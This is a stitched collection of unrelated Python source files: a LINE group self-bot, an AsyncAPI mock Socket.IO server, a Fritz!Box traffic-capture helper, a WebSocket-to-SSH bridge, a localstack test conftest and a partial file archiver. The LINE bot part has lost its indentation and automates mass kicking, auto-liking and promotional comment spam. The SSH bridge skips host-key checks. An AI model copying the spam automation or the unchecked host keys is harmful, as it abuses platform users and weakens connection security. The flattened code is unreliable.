kr.sendText(msg.to,"Daftar Blacklist")
h = ""
for i in wait["blacklist"]:
h = kr.getContact(i)
M = Message()
M.to = msg.to
M.contentType = 13
M.contentMetadata = {'mid': i}
kr.sendMessage(M)
elif msg.text in ["Midban","Mid ban"]:
if msg.toType == 2:
group = kr.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
num=1
cocoa = "══════════List Blacklist═════════"
for mm in matched_list:
cocoa+="\n[%i] %s" % (num, mm)
num=(num+1)
cocoa+="\n═════════List Blacklist═════════\n\nTotal Blacklist : %i" % len(matched_list)
kr.sendText(msg.to,cocoa)
elif msg.text.lower() == 'scan blacklist':
if msg.toType == 2:
group = kr.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
kr.sendText(msg.to,"Tidak ada Daftar Blacklist")
return
for jj in matched_list:
try:
kr.kickoutFromGroup(msg.to,[jj])
print (msg.to,[jj])
except:
pass
#==============================================#
if op.type == 17:
if op.param2 not in Bots:
if op.param2 in Bots:
pass
if wait["protect"] == True:
if wait["blacklist"][op.param2] == True:
try:
kr.kickoutFromGroup(op.param1,[op.param2])
G = kr.getGroup(op.param1)
G.preventJoinByTicket = True
kr.updateGroup(G)
except:
try:
kr.kickoutFromGroup(op.param1,[op.param2])
G = kr.getGroup(op.param1)
G.preventJoinByTicket = True
kr.updateGroup(G)
except:
pass
if op.type == 19:
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["protect"] == True:
wait ["blacklist"][op.param2] = True
kr.kickoutFromGroup(op.param1,[op.param2])
kr.inviteIntoGroup(op.param1,[op.param2])
if op.type == 13:
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["inviteprotect"] == True:
wait ["blacklist"][op.param2] = True
kr.kickoutFromGroup(op.param1,[op.param2])
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["inviteprotect"] == True:
wait ["blacklist"][op.param2] = True
kr.cancelGroupInvitation(op.param1,[op.param3])
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["cancelprotect"] == True:
wait ["blacklist"][op.param2] = True
kr.cancelGroupInvitation(op.param1,[op.param3])
if op.type == 11:
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["linkprotect"] == True:
wait ["blacklist"][op.param2] = True
G = kr.getGroup(op.param1)
G.preventJoinByTicket = True
kr.updateGroup(G)
kr.kickoutFromGroup(op.param1,[op.param2])
if op.type == 5:
if wait["autoAdd"] == True:
if (wait["message"] in [""," ","\n",None]):
pass
else:
kr.sendText(op.param1,str(wait["message"]))
if op.type == 11:
if wait["linkprotect"] == True:
if op.param2 not in Bots:
G = kr.getGroup(op.param1)
G.preventJoinByTicket = True
kr.kickoutFromGroup(op.param1,[op.param3])
kr.updateGroup(G)
if op.type == 17:
if wait["Wc"] == True:
if op.param2 in Bots:
return
ginfo = kr.getGroup(op.param1)
kr.sendText(op.param1, "╔═════════════\n║Selamat Datang Di " + str(ginfo.name) + "\n╠═════════════\n" + "║Founder =>>> " + str(ginfo.name) + " :\n║" + ginfo.creator.displayName + "\n╠═════════════\n" + "║😊Semoga Betah Kak 😘 \n╚═════════════")
print "MEMBER HAS JOIN THE GROUP"
if op.type == 15:
if wait["Lv"] == True:
if op.param2 in Bots:
return
kr.sendText(op.param1, "╔═════════════\n║Baper Ya :v \n║Semoga Bahagia ya 😊 \n╚═════════════")
print "MEMBER HAS LEFT THE GROUP"
#------------------------------------------------------------------------------#
if op.type == 55:
try:
if op.param1 in wait2['readPoint']:
if op.param2 in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += op.param2
wait2['ROM'][op.param1][op.param2] = op.param2
with open('sider.json', 'w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
else:
pass
except:
pass
if op.type == 59:
print op
except Exception as error:
print error
def autolike():
count = 1
while True:
try:
for posts in kr.activity(1)["result"]["posts"]:
if posts["postInfo"]["liked"] is False:
if wait["likeOn"] == True:
kr.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
print "Like"
if wait["commentOn"] == True:
if posts["userInfo"]["writerMid"] in wait["commentBlack"]:
pass
else:
kr.comment(posts["userInfo"]["writerMid"],posts["postInfo"]["postId"],wait["comment"])
except:
count += 1
if(count == 50):
sys.exit(0)
else:
pass
# Start the auto-like worker in the background; daemon=True so it cannot
# keep the process alive once the main thread exits.
thread2 = threading.Thread(target=autolike)
thread2.daemon = True
thread2.start()
def likefriend():
for zx in range(0,10):
hasil = kr.activity(limit=10)
if hasil['result']['posts'][zx]['postInfo']['liked'] == False:
try:
kr.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
kr.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By: ༺T-B-A༻ � 👈 »»» http://line.me/ti/p/jkp4678«««")
print "Like"
except:
pass
else:
print "Already Liked Om"
time.sleep(0.60)
def likeme():
for zx in range(0,10):
hasil = kr.activity(limit=10)
if hasil['result']['posts'][zx]['postInfo']['liked'] == False:
if hasil['result']['posts'][zx]['userInfo']['mid'] in mid:
try:
kr.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
kr.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By: ༺T-B-A༻ � 👈 »»» http://line.me/ti/pa/jkp4679«««")
print "Like"
except:
pass
else:
print "Status Sudah di Like Om"
# Main long-poll loop: fetch up to 5 pending operations per request and
# dispatch each one to bot(). kr.Poll.rev tracks the last revision seen,
# so fetchOps only returns operations newer than it.
while True:
    try:
        Ops = kr.fetchOps(kr.Poll.rev, 5)
    except EOFError:
        # An EOF here usually means the stored revision is stale/invalid.
        raise Exception("It might be wrong revision\n" + str(kr.Poll.rev))
    for Op in Ops:
        if (Op.type != OpType.END_OF_OPERATION):
            # Advance the revision watermark before handling the op.
            kr.Poll.rev = max(kr.Poll.rev, Op.revision)
            bot(Op)
|
mock_server.py
|
"""
The :class:`MockAsynctionSocketIO` server is essentially
an :class:`AsynctionSocketIO` server that:
* Periodically emits events containing payloads of fake data,
through tasks running on the background.
* Listens for all events defined in the given AsyncAPI specification,
returning fake acknowledgments where applicable.
"""
import threading
from functools import partial
from pathlib import Path
from queue import Queue
from random import choice
from typing import Callable
from typing import Mapping
from typing import MutableSequence
from typing import Optional
from typing import Sequence
from faker import Faker
from faker.exceptions import UnsupportedFeature
from flask import Flask
from hypothesis import HealthCheck
from hypothesis import Phase
from hypothesis import Verbosity
from hypothesis import given
from hypothesis import settings
from hypothesis.strategies import SearchStrategy
from hypothesis.strategies import sampled_from
from hypothesis_jsonschema import from_schema
from hypothesis_jsonschema._from_schema import STRING_FORMATS
from asynction.security import security_handler_factory
from asynction.server import AsynctionSocketIO
from asynction.server import _noop_handler
from asynction.types import AsyncApiSpec
from asynction.types import ErrorHandler
from asynction.types import JSONMapping
from asynction.types import JSONSchema
from asynction.types import Message
from asynction.types import SecurityRequirement
from asynction.validation import bindings_validator_factory
from asynction.validation import publish_message_validator_factory
CustomFormats = Mapping[str, SearchStrategy[str]]
def make_faker_formats(faker: Faker, sample_size: int) -> CustomFormats:
    """Map Faker provider names to Hypothesis strategies over pre-drawn samples.

    Every public Faker provider that returns a string (and does not clash
    with the string formats hypothesis-jsonschema already knows) becomes a
    custom string format backed by ``sample_size`` pre-generated values.

    :param faker: The Faker instance to draw samples from.
    :param sample_size: Number of samples per provider. Values ``< 1``
                        disable custom formats entirely.
    :returns: A mapping of format name to a ``sampled_from`` strategy.
    """
    custom_formats: dict = {}
    if sample_size < 1:
        return custom_formats
    for attr in dir(faker):
        # Skip private attributes, Faker generator internals, and formats
        # that hypothesis-jsonschema provides out of the box.
        if attr.startswith("_") or attr in Faker.generator_attrs or attr in STRING_FORMATS:
            continue
        try:
            provider = getattr(faker, attr)
            # Only string-producing providers qualify as string formats.
            if not isinstance(provider(), str):
                continue
            samples = [provider() for _ in range(sample_size)]
        except (TypeError, UnsupportedFeature):
            # Skip legacy providers or providers that require extra dependencies
            continue
        # Plain assignment instead of rebuilding the whole mapping with
        # dict unpacking on every addition (the original was quadratic).
        custom_formats[attr] = sampled_from(samples)
    return custom_formats
def generate_fake_data_from_schema(
    schema: JSONSchema,
    custom_formats: CustomFormats,
) -> JSONMapping:
    """Return one randomly chosen fake payload that conforms to *schema*."""
    strategy = from_schema(schema, custom_formats=custom_formats)  # type: ignore

    # Hypothesis only yields examples through an @given-decorated function,
    # so we run one whose body merely records every generated example.
    @given(strategy)
    @settings(
        database=None,
        max_examples=30,
        deadline=None,
        verbosity=Verbosity.quiet,
        phases=(Phase.generate,),  # generation only: no shrinking or replay
        suppress_health_check=HealthCheck.all(),
    )
    def example_generating_inner_function(ex):
        examples.append(ex)

    # Defined after the decorated function but before it runs; the closure
    # binds the name, not the object, so this ordering is safe.
    examples: MutableSequence[JSONMapping] = []
    example_generating_inner_function()
    return choice(examples)
# A subscription task is a zero-argument callable that emits a single
# fake event to connected clients.
SubscriptionTask = Callable[[], None]


def task_runner(queue: "Queue[SubscriptionTask]") -> None:
    """Worker loop: execute tasks pulled from *queue* until the thread dies."""
    while True:
        job = queue.get()
        job()
        queue.task_done()


def task_scheduler(
    tasks: Sequence[SubscriptionTask],
    queue: "Queue[SubscriptionTask]",
    sleep: Callable[[], None],
) -> None:
    """Producer loop: enqueue every task, pause via *sleep*, then repeat."""
    while True:
        for pending in tasks:
            queue.put(pending)
        sleep()
class MockAsynctionSocketIO(AsynctionSocketIO):
"""Inherits the :class:`AsynctionSocketIO` class."""
def __init__(
self,
spec: AsyncApiSpec,
validation: bool,
docs: bool,
app: Optional[Flask],
custom_formats_sample_size: int,
**kwargs,
):
"""This is a private constructor.
Use the :meth:`MockAsynctionSocketIO.from_spec` factory instead.
"""
super().__init__(spec, validation=validation, docs=docs, app=app, **kwargs)
self.faker = Faker()
self.custom_formats = make_faker_formats(self.faker, custom_formats_sample_size)
self._subscription_tasks: Sequence[SubscriptionTask] = []
@classmethod
def from_spec(
cls,
spec_path: Path,
validation: bool = True,
server_name: Optional[str] = None,
docs: bool = True,
default_error_handler: Optional[ErrorHandler] = None,
app: Optional[Flask] = None,
custom_formats_sample_size: int = 20,
**kwargs,
) -> "MockAsynctionSocketIO":
"""Create a Flask-SocketIO mock server given an AsyncAPI spec.
The server emits events containing payloads of fake data in regular intervals,
through background subscription tasks.
It also listens for events as per the spec definitions
and returns mock aknowledgements where applicable.
All event and acknowledgment payloads adhere to the schemata defined
within the AsyncAPI spec.
In addition to the args and kwargs of :meth:`AsynctionSocketIO.from_spec`,
this factory method accepts some extra keyword arguments:
* ``custom_formats_sample_size``
:param spec_path: The path where the AsyncAPI YAML specification is located.
:param validation: When set to ``False``, message payloads, channel
bindings and ack callbacks are NOT validated.
Defaults to ``True``.
:param server_name: The server to pick from the AsyncAPI ``servers`` object.
The server object is then used to configure
the path ``kwarg`` of the SocketIO server.
:param docs: When set to ``True``, HTML rendered documentation is generated
and served through the ``GET {base_path}/docs`` route of the app.
The ``GET {base_path}/docs/asyncapi.json`` route is also exposed,
returning the raw specification data for programmatic retrieval.
Defaults to ``True``.
:param default_error_handler: The error handler that handles any namespace
without an explicit error handler.
Equivelant of ``@socketio.on_error_default``
:param app: The flask application instance. Defaults to ``None``.
:param custom_formats_sample_size: The ammout of the Faker provider samples
to be used for each custom string format.
Hypotheses uses these samples to generate
fake data. Set to ``0`` if custom formats
are not needed.
Defaults to ``20``.
:param kwargs: Flask-SocketIO, Socket.IO and Engine.IO server options.
:returns: A Flask-SocketIO mock server, emitting events of fake data in
regular intervals.
The server also has mock event and error handlers registered.
Example::
mock_asio = MockAsynctionSocketIO.from_spec(
spec_path="./docs/asyncapi.yaml",
app=flask_app,
# any other kwarg that the flask_socketio.SocketIO constructor accepts
)
"""
return super().from_spec(
spec_path,
validation=validation,
server_name=server_name,
docs=docs,
default_error_handler=default_error_handler,
app=app,
custom_formats_sample_size=custom_formats_sample_size,
**kwargs,
)
def _register_handlers(
self,
server_security: Sequence[SecurityRequirement] = (),
default_error_handler: Optional[ErrorHandler] = None,
) -> None:
for namespace, channel in self.spec.channels.items():
if channel.publish is not None:
for message in channel.publish.message.oneOf:
handler = self.make_publish_handler(message)
if self.validation:
with_payload_validation = publish_message_validator_factory(
message=message
)
handler = with_payload_validation(handler)
self.on_event(message.name, handler, namespace)
if channel.subscribe is not None:
self._subscription_tasks = [
*self._subscription_tasks,
*[
self.make_subscription_task(message, namespace)
for message in channel.subscribe.message.oneOf
],
]
connect_handler = _noop_handler
if self.validation:
with_bindings_validation = bindings_validator_factory(channel.bindings)
connect_handler = with_bindings_validation(connect_handler)
security = (
channel.x_security
if channel.x_security is not None
else server_security
)
if security:
# create a security handler wrapper
with_security = security_handler_factory(
security,
self.spec.components.security_schemes,
)
# apply security
connect_handler = with_security(connect_handler)
if connect_handler is not _noop_handler:
self.on_event("connect", connect_handler, namespace)
if default_error_handler is not None:
self.on_error_default(default_error_handler)
def make_subscription_task(
self, message: Message, namespace: str
) -> SubscriptionTask:
def task() -> None:
self.emit(
message.name,
generate_fake_data_from_schema(
message.payload or {"type": "null"}, self.custom_formats
),
namespace=namespace,
callback=message.x_ack and _noop_handler,
)
return task
def make_publish_handler(self, message: Message) -> Callable:
if message.x_ack is not None:
def handler(*args, **kwargs):
return generate_fake_data_from_schema(
message.x_ack.args, self.custom_formats
)
return handler
return _noop_handler
def start_background_task(
self, target: Callable, *args, **kwargs
) -> threading.Thread:
# The tasks created in the :meth:`MockAsynctionSocketIO.run` method below
# (both runner and scheduler) MUST be daemonic.
# However, python-engineio does not support daemonic background tasks,
# unless the chosen async mode defaults to some daemon-like behaviour.
# Native threads have daemon set to False by default, which is rather
# inconvinient for this use case.
# See the relevant issue:
# https://github.com/miguelgrinberg/python-engineio/issues/244
#
# The current method is a hack that accounts for the threading scenario,
# to ensure that native threads are started as daemons.
if self.async_mode == "threading":
th = threading.Thread(target=target, args=args, kwargs=kwargs, daemon=True)
th.start()
return th
return super().start_background_task(target, *args, **kwargs)
    def run(
        self,
        app: Flask,
        host: Optional[str] = None,
        port: Optional[int] = None,
        subscription_task_interval: float = 1.0,
        max_worker_number: int = 8,
        **kwargs,
    ) -> None:
        """
        Run the mock Asynction SocketIO web server.
        In addition to the args and kwargs of :meth:`flask_socketio.SocketIO.run`,
        this method accepts some extra keyword arguments:
        * ``subscription_task_interval``
        * ``max_worker_number``
        :param app: The flask application instance.
        :param host: The hostname or IP address for the server to listen on.
                     Defaults to ``127.0.0.1``.
        :param port: The port number for the server to listen on. Defaults to
                     ``5000``.
        :param subscription_task_interval: How often (in seconds) a subscription task
                                           (thread that emits an event to
                                           a connected client) is scheduled.
                                           Defaults to ``1.0``.
        :param max_worker_number: The maximum number of workers to be started for the
                                  purposes of executing background subscription tasks.
                                  Defaults to ``8``.
        :param kwargs: Additional web server options that are propagated to
                       :meth:`flask_socketio.SocketIO.run`. The web server options
                       are specific to the server used in each of the supported
                       async modes. Refer to the Flask-SocketIO docs for details.
        """
        # Single shared queue feeding all worker threads with subscription tasks.
        queue: "Queue[SubscriptionTask]" = self.server.eio.create_queue()
        # No point starting more workers than there are distinct tasks.
        for _ in range(min(max_worker_number, len(self._subscription_tasks))):
            _ = self.start_background_task(task_runner, queue=queue)
        # Single scheduler thread re-enqueues every task each interval.
        _ = self.start_background_task(
            task_scheduler,
            tasks=self._subscription_tasks,
            queue=queue,
            sleep=partial(self.sleep, subscription_task_interval),
        )
        return super().run(app, host=host, port=port, **kwargs)
|
get_traffic.py
|
# coding=utf-8
from __future__ import unicode_literals, print_function
import os
import datetime
import threading
import requests
from django.conf import settings
from .fritz_browser import FritzBrowser
from ..models import DummyLogger, Capture
def get_traffic(num_seconds=10, browser=None, log=None):
    """Capture ``num_seconds`` of network traffic from a Fritz!Box router.

    Starts the router's capture endpoint, streams the data to a dated file
    under ``MEDIA_ROOT/capture/`` in a background thread, stops the capture
    after the requested time and records a ``Capture`` model row.

    Fix: removed the unreachable block that followed the final ``return``
    (leftover Selenium table-clicking code that could never execute).

    :param num_seconds: capture duration in seconds.
    :param browser: optional pre-authenticated ``FritzBrowser``; created
        (and the capture page opened) when omitted.
    :param log: optional logger with a ``log(msg)`` method; defaults to
        ``DummyLogger``.
    """
    if log is None:
        log = DummyLogger()
    if browser is None:
        log.log("creating browser")
        browser = FritzBrowser()
        browser.open_capture()
    # e.g. http://fritz.box/cgi-bin/capture_notimeout?sid=...&capture=Start&snaplen=1600&ifaceorminor=3-0
    start_url = browser.get_capture_url()
    stop_url = browser.get_capture_stop_url()
    filepath = os.path.join(
        settings.MEDIA_ROOT, "capture", "%s" % datetime.date.today()
    )
    if not os.path.exists(filepath):
        os.makedirs(filepath)
    now = datetime.datetime.now().replace(microsecond=0)
    now_str = ("%s" % now).replace(":", "-").replace(" ", "-")
    short_filename = "%s.eth" % now_str
    filename = os.path.join(filepath, short_filename)
    # The capture request streams until the stop URL is hit, so download in a
    # background thread while this thread times the capture window.
    thread = threading.Thread(target=lambda: _store_capture(start_url, filename, log))
    log.log("starting capture thread")
    thread.start()
    browser.sleep(num_seconds)
    requests.get(stop_url)
    if thread.is_alive():
        thread.join()
    Capture.objects.create(
        date=now,
        seconds=num_seconds,
        filename=short_filename,
        size=os.path.getsize(filename),
    )
def _store_capture(url, filename, log):
    """Download the capture stream from *url* and write it to *filename*.

    Fix: the file mode was ``b"wb"`` (a bytes object), which raises
    ``TypeError: open() mode must be str`` on Python 3 — changed to ``"wb"``.
    """
    res = requests.get(url)
    with open(filename, "wb") as f:
        f.write(res.content)
    log.log("stored %s bytes" % len(res.content))
|
webssh_connection.py
|
import json
import socket
from threading import Thread
import paramiko
class SSH:
    """Bridges a WebSocket connection to an interactive SSH PTY channel."""

    def __init__(self, websocket, message):
        # websocket: object providing send()/close(); message: dict template
        # reused for the close notification in close().
        self.websocket = websocket
        self.message = message
        self.channel = None

    def connect(self, host, user, password=None, port=22, timeout=30, term='xterm', pty_width=80, pty_height=24,
                private_key=''):
        """Open an SSH session and an interactive shell channel.

        Authenticates with *private_key* (path to an RSA key file) when
        given, otherwise with *password*. The first two chunks of shell
        output (banner/prompt) are forwarded to the websocket right away.
        Any failure closes the websocket via close().
        """
        try:
            ssh_client = paramiko.SSHClient()
            # NOTE(review): AutoAddPolicy accepts unknown host keys without
            # verification — acceptable only for trusted internal networks.
            ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
            if private_key:
                pkey = paramiko.RSAKey.from_private_key_file(private_key)
                ssh_client.connect(hostname=host, port=port, username=user, pkey=pkey)
            else:
                ssh_client.connect(username=user, password=password, hostname=host, port=port, timeout=timeout)
            transport = ssh_client.get_transport()
            self.channel = transport.open_session()
            self.channel.get_pty(term=term, width=pty_width, height=pty_height)
            self.channel.invoke_shell()
            # Forward the initial shell output (two blocking reads).
            for i in range(2):
                recv = self.channel.recv(1024).decode('utf-8')
                self.websocket.send(recv)
        except socket.timeout:
            # User-facing message: "ssh connection timed out" (kept verbatim).
            message = 'ssh 连接超时'
            self.websocket.send(message)
            self.close()
        except Exception as e:
            print(e)
            self.close()

    def resize_pty(self, cols, rows):
        """Resize the remote PTY to *cols* x *rows*."""
        self.channel.resize_pty(width=cols, height=rows)

    def django_to_ssh(self, data):
        """Forward keyboard *data* from the websocket side to the SSH channel."""
        try:
            self.channel.send(data)
        except Exception as e:
            print(e)
            self.close()

    def websocket_to_django(self, data):
        """Send *data*, then pump SSH output to the websocket until EOF."""
        self.channel.send(data)
        try:
            while True:
                data = self.channel.recv(1024).decode('utf-8')
                # Empty read means the remote side closed the channel.
                if not len(data):
                    return
                self.websocket.send(data)
        except Exception as e:
            print(e)
            self.close()

    def close(self):
        """Notify the client (status=1) and close the websocket."""
        self.message['status'] = 1
        self.message['message'] = 'Close Connection'
        message = json.dumps(self.message)
        self.websocket.send(message)
        self.websocket.close()

    def shell(self, data):
        """Run the send/receive pump in a background thread."""
        Thread(target=self.websocket_to_django, args=(data,)).start()
|
conftest.py
|
"""
Pytest configuration that spins up a single localstack instance that is shared across test modules.
See: https://docs.pytest.org/en/6.2.x/fixture.html#conftest-py-sharing-fixtures-across-multiple-files
It is thread/process safe to run with pytest-parallel, however not for pytest-xdist.
"""
import logging
import multiprocessing as mp
import os
import threading
import pytest
from localstack import config
from localstack.constants import ENV_INTERNAL_TEST_RUN
from localstack.services import infra
from localstack.utils.analytics.profiler import profiled
from localstack.utils.common import safe_requests
from tests.integration.test_terraform import TestTerraform
logger = logging.getLogger(__name__)
# Multiprocessing events shared across pytest-parallel workers to coordinate
# the single localstack instance's lifecycle.
localstack_started = mp.Event()  # event indicating whether localstack has been started
localstack_stop = mp.Event()  # event that can be triggered to stop localstack
localstack_stopped = mp.Event()  # event indicating that localstack has been stopped
startup_monitor_event = mp.Event()  # event that can be triggered to start localstack
will_run_terraform_tests = mp.Event()  # flag to indicate that terraform should be initialized
@pytest.hookimpl()
def pytest_configure(config):
    # first pytest lifecycle hook
    # Spawn the startup monitor early; it blocks until startup_monitor_event
    # is set, so localstack only starts once the test loop asks for it.
    _start_monitor()
def pytest_runtestloop(session):
    # second pytest lifecycle hook (before test runner starts)
    # Flag terraform usage up front so the infra bootstrap can pre-initialize
    # the terraform binary (short-circuits on the first matching item).
    if any('terraform' in str(item.parent).lower() for item in session.items):
        will_run_terraform_tests.set()
    # Nothing to run (empty selection or collect-only): skip the startup.
    if not session.items:
        return
    if session.config.option.collectonly:
        return
    # trigger localstack startup in startup_monitor and wait until it becomes ready
    startup_monitor_event.set()
    localstack_started.wait()
@pytest.hookimpl()
def pytest_unconfigure(config):
    # last pytest lifecycle hook (before pytest exits)
    # Safe even if localstack never started: startup_monitor checks the stop
    # flag after being woken and exits cleanly in that case.
    _trigger_stop()
def _start_monitor():
    # Run startup_monitor in a background thread so pytest_configure returns
    # immediately; the thread blocks on startup_monitor_event.
    threading.Thread(target=startup_monitor).start()
def _trigger_stop():
    # Order matters: set the stop flag first, then wake the monitor, so a
    # monitor that never started localstack sees the flag and exits.
    localstack_stop.set()
    startup_monitor_event.set()
def startup_monitor() -> None:
    """
    The startup monitor is a thread that waits for the startup_monitor_event and, once the event is true, starts a
    localstack instance in its own thread context.
    """
    logger.info('waiting on localstack_start signal')
    startup_monitor_event.wait()
    if localstack_stop.is_set():
        # this is called if _trigger_stop() is called before any test has requested the localstack_runtime fixture.
        logger.info('ending startup_monitor')
        localstack_stopped.set()
        return
    logger.info('running localstack')
    # Blocks for the whole localstack lifetime (until _trigger_stop()).
    run_localstack()
def run_localstack():
    """
    Start localstack and block until it terminates. Terminate localstack by calling _trigger_stop().
    """
    # configure
    os.environ[ENV_INTERNAL_TEST_RUN] = '1'
    safe_requests.verify_ssl = False
    config.FORCE_SHUTDOWN = False
    config.EDGE_BIND_HOST = '0.0.0.0'
    def watchdog():
        # Blocks until the stop flag fires, then tears the infra down.
        logger.info('waiting stop event')
        localstack_stop.wait()  # triggered by _trigger_stop()
        logger.info('stopping infra')
        infra.stop_infra()
    def start_profiling(*args):
        # No-op unless profiling was requested via config.
        if not config.USE_PROFILER:
            return
        @profiled()
        def profile_func():
            # keep profiler active until tests have finished
            localstack_stopped.wait()
        print('Start profiling...')
        profile_func()
        print('Done profiling...')
    monitor = threading.Thread(target=watchdog)
    monitor.start()
    logger.info('starting localstack infrastructure')
    infra.start_infra(asynchronous=True)
    threading.Thread(target=start_profiling).start()
    if will_run_terraform_tests.is_set():
        logger.info('running terraform init')
        # init terraform binary if necessary
        TestTerraform.init_async()
    logger.info('waiting for infra to be ready')
    infra.INFRA_READY.wait()  # wait for infra to start (threading event)
    localstack_started.set()  # set conftest inter-process Event
    logger.info('waiting for shutdown')
    try:
        # The watchdog thread only exits after infra was stopped.
        logger.info('waiting for watchdog to join')
        monitor.join()
    finally:
        logger.info('ok bye')
        localstack_stopped.set()
@pytest.fixture(scope='session', autouse=True)
def localstack_runtime():
    """
    This is a dummy fixture. Each test requests the fixture, but it actually just makes sure that localstack is running,
    blocks until localstack is running, or starts localstack the first time the fixture is requested.
    It doesn't actually do anything but signal to the `startup_monitor` function.
    """
    if localstack_started.is_set():
        # called by all tests after the startup has completed and the initial tests are unblocked
        yield
        return
    # First requester: wake the startup monitor and block until ready.
    startup_monitor_event.set()
    localstack_started.wait()
    yield
    return
|
nanoscp.py
|
#! python
import os, sys, glob, time
import threading, queue
import tarfile
import paramiko, socket
import re
import wx
import wx.lib
from wx.lib import intctrl
from watchdog.observers import Observer
from watchdog.events import RegexMatchingEventHandler
from watchdog.events import FileMovedEvent
# Handle file system events matching regex
class FileHandler(RegexMatchingEventHandler):
    """Watchdog handler that forwards matching file-event paths to a callback.

    Fix: the default for ``regex`` was a mutable list (``['.*']``), the
    classic shared-mutable-default pitfall; it is now an immutable tuple
    that is converted per call.

    :param regex: iterable of regex strings files must match.
    :param notify: callable invoked with the source path of each event.
    """

    def __init__(self, regex=('.*',), notify=None):
        super().__init__(regexes=list(regex), ignore_directories=True)
        self.notify = notify

    def on_any_event(self, event):
        # Moves are also reported as separate created/deleted events; skip
        # the move event itself to avoid double notifications.
        if not event.is_directory and self.notify and not isinstance(event, FileMovedEvent):
            self.notify(event.src_path)
# Set with timestamp to retrieve items at least n seconds not touched
class TimedSet():
    """Thread-safe set of items stamped with their insertion time.

    ``get`` removes and returns only those items that have been untouched
    for at least ``t_wait`` seconds; re-``put``-ing an item refreshes its
    timestamp.
    """

    def __init__(self):
        self._stamps = dict()
        self._lock = threading.Lock()

    def put(self, item):
        """Insert *item*, refreshing its timestamp if already present."""
        with self._lock:
            self._stamps[item] = time.time()

    def get(self, t_wait=0):
        """Remove and return all items untouched for >= *t_wait* seconds."""
        ripe = []
        now = time.time()
        with self._lock:
            for item in list(self._stamps):
                if self._stamps[item] + t_wait <= now:
                    del self._stamps[item]
                    ripe.append(item)
        return ripe
# Logger
class Log(list):
    """A list of log records that notifies registered callbacks on append."""

    def __init__(self, **kwargs):
        self.callbacks = []
        return super().__init__(**kwargs)

    def add_callback(self, callback):
        """Register *callback* to be invoked with every appended record."""
        self.callbacks.append(callback)

    def append(self, record):
        """Fan *record* out to all callbacks, then store it in the list."""
        for notify in self.callbacks:
            notify(record)
        return super().append(record)
# Archive sets of files as tar balls
class FileArchiver():
    """Collects file names and writes them as numbered tar archives of
    ``batch_size`` files each, on a background worker thread.

    Fixes:
    * ``__archiver__`` checked the queue without holding the lock and then
      waited unconditionally — a batch (or the stop() poison pill) queued
      between the check and the ``wait()`` was missed, hanging ``join()``
      forever. Replaced with the canonical predicate-``while`` wait.
    * ``log=Log()`` was a shared mutable default; a fresh ``Log`` is now
      created per instance when no logger is supplied.
    """

    def __init__(self, dst_path, name_prefix='', batch_size=4000, count_offset=0, log=None):
        """
        :param dst_path: directory receiving the ``<prefix><n>.tar`` files.
        :param name_prefix: prefix for archive file names.
        :param batch_size: number of files per archive.
        :param count_offset: starting value of the archive counter.
        :param log: object with an ``append(msg)`` method; a fresh ``Log``
            is created when omitted.
        """
        self.dst_path = dst_path
        self.name_prefix = name_prefix
        self.batch_size = batch_size
        self.__current_count = count_offset
        self.__data_queue = []      # files not yet forming a full batch
        self.__archive_queue = []   # complete batches awaiting the worker
        self.__condition = threading.Condition()
        self.__archive_worker = None
        self.log = log if log is not None else Log()

    def __del__(self):
        # Best-effort cleanup if the user forgot to call stop().
        if self.__archive_worker:
            self.stop()

    def add(self, file_name):
        """Queue *file_name*; hand a full batch to the worker when reached."""
        with self.__condition:
            self.__data_queue.append(file_name)
            if len(self.__data_queue) >= self.batch_size:
                self.__archive_queue.append(self.__data_queue[:self.batch_size])
                del self.__data_queue[:self.batch_size]
                self.__condition.notify_all()

    def start(self):
        """Start the background archiving worker (no-op if already running)."""
        if not self.__archive_worker:
            self.__archive_worker = threading.Thread(target=self.__archiver__)
            self.__archive_worker.start()

    def stop(self, partial_write=True):
        """Stop the worker, optionally flushing the incomplete last batch."""
        if self.__archive_worker:
            with self.__condition:
                if partial_write and len(self.__data_queue) > 0:
                    self.__archive_queue.append(self.__data_queue)
                # An empty batch is the poison pill that ends the worker.
                self.__archive_queue.append([])
                self.__condition.notify_all()
            self.__archive_worker.join()
            self.__archive_worker = None

    def __archiver__(self):
        """Worker loop: drain queued batches, writing one tar per batch."""
        while True:
            with self.__condition:
                # Predicate loop: re-check the queue under the lock before
                # each wait(), so notifications can never be lost and
                # spurious wakeups are harmless.
                while not self.__archive_queue:
                    self.__condition.wait()
                batches = self.__archive_queue.copy()
                self.__archive_queue.clear()
            # Write archives outside the lock so add() is never blocked on I/O.
            for batch in batches:
                if not batch:
                    return  # poison pill exit
                try:
                    dst = os.path.join(self.dst_path, self.name_prefix + str(self.__current_count) + '.tar')
                    if os.path.isfile(dst):
                        self.log.append('[ERROR] File ' + dst + ' already exists, skiped writing')
                        continue
                    with tarfile.open(dst, 'w') as fp:
                        for f in batch:
                            fp.add(f, arcname=os.path.basename(f))
                    self.log.append('Archived ' + str(len(batch)) + ' files as ' + self.name_prefix + str(self.__current_count) + '.tar')
                    self.__current_count += 1
                except FileExistsError as e:
                    self.log.append('[ERROR] File ' + self.name_prefix + str(self.__current_count) + '.tar' + ' already exists, output NOT written')
# SCP client
class SCP():
    """Empty stub for the SCP upload client; no functionality implemented
